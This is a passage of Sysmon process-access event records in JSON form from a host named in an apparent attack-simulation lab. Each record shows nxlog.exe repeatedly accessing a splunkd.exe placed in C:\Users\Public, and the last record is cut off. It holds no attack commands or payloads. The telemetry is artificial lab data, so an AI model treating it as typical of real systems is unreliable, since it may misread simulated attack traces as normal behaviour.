{"EventTime":"2020-08-01 06:52:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:18.452\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:18.452","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:19.453\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:19.453","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:20.454\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:20.454","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:21.455\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:21.455","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:22.456\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:22.456","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:23.457\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:23.457","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:24.458\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 